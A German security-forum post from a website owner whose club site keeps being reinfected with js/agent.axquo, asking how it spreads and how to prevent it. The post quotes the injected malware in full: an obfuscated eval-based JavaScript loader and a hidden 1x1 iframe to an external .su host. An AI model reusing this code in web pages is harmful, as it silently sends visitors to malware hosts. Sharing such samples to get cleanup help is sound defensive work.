| |  2x | Erneuter Befall von js/agent.axquo
 Hallo,
in folgendem Thread habe ich bereits mein Problem beschrieben: http://www.trojaner-board.de/131640-...tml-datei.html
Ich hoffe ich verletze mit einem erneuten Post die Forenregeln nicht, falls doch entschuldigt bitte.
Ich habe dann herrausgefunden welches der Schadcode ist: Zum einen der komplette <Script> Tag, sowie das <iframe>. Deshalb habe ich mir die Datei auf meinen Pc geladen, Avira ausgeschalten, die Datei geöffnet, den Schadcode entfernt, die Datei erneut abgespeichert und Avira wieder aktiviert. Im Anschluss die "saubere" Datei hochgeladen und siehe da, Firefox und Google gaben meine Homepage wieder frei.
Jedoch tritt nun ca. 4 Tage später das selbe Problem wieder auf!
Deshalb meine Fragen:
-Kann dies daran liegen, dass die Zugangsdaten zum Server noch nicht geändert wurden (wurde inzwischen veranlasst)?
- Was kann ich tun damit dies nicht wieder vorkommt?
- Gibt es eine "bessere" Lösung als die Dateien von Hand zu bereinigen und mir dadurch jedes mal einen Virus einzufangen den ich dann wieder von Avira löschen lassen muss?
- Ich nehme an eine Art "Schadcode"-Antivirensoftware, welche ich per ftp auf den Server spielen kann und dort laufen lassen kann gibt es nicht?^^
- Wie kann sich der Code auf dem Server "verteilen"? (Es handelt sich hier um die Homepage eines Sportvereins, verschiedene Abteilungen welche alle einen Unterordner auf dem Server haben waren/sind befallen)
Zum Schadcode selbst: Kann mir einer nähere Informationen dazu geben? Was kann er anrichten? Hat er evtl schon was angerichtet? Wie gefährlich ist er? Wie bekommt man den?
Internet und Avira haben leider keine genauere Infos dazu, Avira meldet folgenden in den html-files: js/agent.axquo
Den Schadcode selbst habe ich ja bereits erwähnt und schicke ich euch anbei noch einmal.  für eure Hilfe Zitat: |
<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(w w.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j ","3 p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f "," 27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e"," 18 ","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47" ,"45 ","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40" ,"29 ","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m" ,"4c ","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46" ,"26 ","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n" ,"3o ","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18" ,"1f ","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9" ,"4e ","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c" ,"1e ","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l" ,"1d ","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45" ,"3p ","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j" ,"1n ","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40" ,"41 ","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n" ,"1k ","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c" ,"47 ","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i" ,"1d ","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d" ,"1i ","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c ","4 b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40" ,"4 1","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script
| und Zitat: |
<iframe src="hxxp://sraphicshouldn.su/img2/count.htm" width="1" height="1" frameborder="0"></iframe
|
|
05.03.2013, 18:03
Linear-Darstellung
